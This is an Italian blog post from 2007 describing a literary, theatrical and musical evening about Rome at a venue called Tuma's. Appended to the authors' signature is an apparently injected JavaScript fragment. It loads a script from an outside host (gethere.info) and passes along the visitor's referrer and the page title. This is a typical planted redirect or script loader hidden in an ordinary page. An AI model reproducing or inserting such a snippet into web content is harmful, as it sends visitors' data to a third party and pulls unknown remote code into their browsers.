09 gennaio 2007: Amor di Roma

Roma letteraria, musicale e gastronomica

Il 9 gennaio inizia la nostra avventura con il circolo Bel-Ami. Arrivate al Tuma’s, incerte del nostro compito, veniamo subito coinvolte nell’organizzazione da Francesca, perfetta conduttrice della serata, non solo perché ottima organizzatrice ma anche perchè vero e proprio “animale da palcoscenico”. Conosciamo subito Irene Mancini, autrice dei quadri in esposizione. Una ragazza dall’animo dolce e timido che rivela poi tutta la sua forza nelle tele caratterizzate dall’atmosfera crepuscolare di Roma al momento dell’alba e dall’uso del nero più profondo della notte.

Si inizia con la lettura di brani dedicati alle tante e tipiche fontane dell’Urbe, per poi passare a quei poeti che attraverso l’uso di un dialetto puro hanno raccontato i vizi e le virtù della società romana nei secoli, dai papi fino alla Roma capitale. E così Trilussa, Belli e Petrolini ci hanno ricordato un dialetto che con tante trasformazioni è arrivato fino a noi nelle poesie del nostro amico Simone. Tutta la poesia della romanità viene poi espressa in un momento di teatro: sul palco Francesca ne “La Donna in Nero” e Nello Cantone ne “Er Fattaccio”, entrambi bravissimi a far rivivere quegli aspetti di sensibilità e passione tipici del romano del Primo Novecento. La serata prosegue in un alternarsi di emozioni, dalla drammaticità di una donna che non sa come dar da mangiare al figlio si arriva alla spensieratezza degli stornelli romani, magistralmente interpretati dal maestro Enzo Ponziani e il cantante Roberto Bussaglia, che sono riusciti a coinvolgere il pubblico facendolo cantare e divertire con canzoni che ogni romano porta nel cuore.

Tra uno stornello e un altro attraverso le parole di artisti non romani come Pasolini e Gogol abbiamo potuto rivivere l’elogio di una Roma che già dal primo incontro non può che rapirti per tutta la vita. Dunque un evento che è riuscito a rappresentare la vera essenza della nostra città, in ogni sua sfaccettatura, e a farci ricordare aspetti che sembravano dimenticati.

Dafne Cola e Ornella Rodias.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Post Tagged with , ,